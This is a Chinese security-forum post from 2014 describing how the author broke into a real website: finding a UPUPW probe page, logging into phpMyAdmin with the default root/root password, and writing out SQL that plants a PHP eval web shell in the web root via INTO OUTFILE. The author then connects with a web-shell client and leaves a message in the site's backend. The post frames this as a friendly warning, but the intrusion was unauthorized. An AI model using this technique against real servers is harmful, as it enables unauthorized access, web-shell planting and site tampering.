查看: 11910|回复: 0

记一次检测网站(08sec申请转正帖)

[复制链接]

该用户从未签到

发表于 2014-5-26 21:03:48 | 显示全部楼层 |阅读模式
##########################################
#  Title    :记一次检测网站(08sec申请转正帖)
#  Time   : 2014年5月26日
#  Team  :   
#  Author : esaaset
#  首发   : 08安全小组
#######################################

说明,本人菜鸟一个,第一次在08sec上发贴.

今天碰到一个站
1.jpg
最近看小说找到一个,二级域名的,
一看DEDE的图标,就想会不会比较容易进去呢?
于是,换了下主域名进去.
2.jpg
3.jpg
UPUPW探针显示出来了,看来没有默认首页呀.
刚好前几天装过这个.这个用的是国产 kangle的反向代理服务器.支持ASP和PHP,和MYSQL.感觉比win2003的IIS好用呀.
页面下面有这个
4.jpg
随手试了下.密码:root 连接显示成功了.
??这管理员都不改密码?,不行我得提醒他,要不然这个站被人日了.偶看不了小说了,怎摸办?
回到上面,
5.jpg
先打开PHP详细信息,查看物理地址.
QQ图片20140526203909.jpg
D:\upupw\htdocs\
点开phpMyAdmin,输入帐号root密码:root;进phpMyAdmin

QQ图片20140526203927.jpg
再通过数据库,导出一个PHP文件
随便选个数据库,然后执行以下的sql
Create TABLE a (cmd text NOT NULL);

Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>');

select cmd from a into outfile 'D:/upupw/htdocs/eval.php';

Drop TABLE IF EXISTS a;
QQ图片20140526203939.jpg
好了,拿上菜刀.
QQ图片20140526203948.jpg

唉,目录权限都没有设置.裸奔呀.
算了,在他的后台加上几个字提醒下.
QQ图片20140526203956.jpg
希望管理员进来后看得到.
接下来呢,传一个udf提权?,算了,我是好人.,撤了.
其实这篇文章一点技术含量都没有,主要是管理员的大意,才让菜鸟我可以畅通无阻.同时想提醒站长安全要注意.
这就是全部过程,希望在08CMS中学习更多知识.
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

GMT+8, 2024-11-1 15:29 , Processed in 0.028586 second(s), 17 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部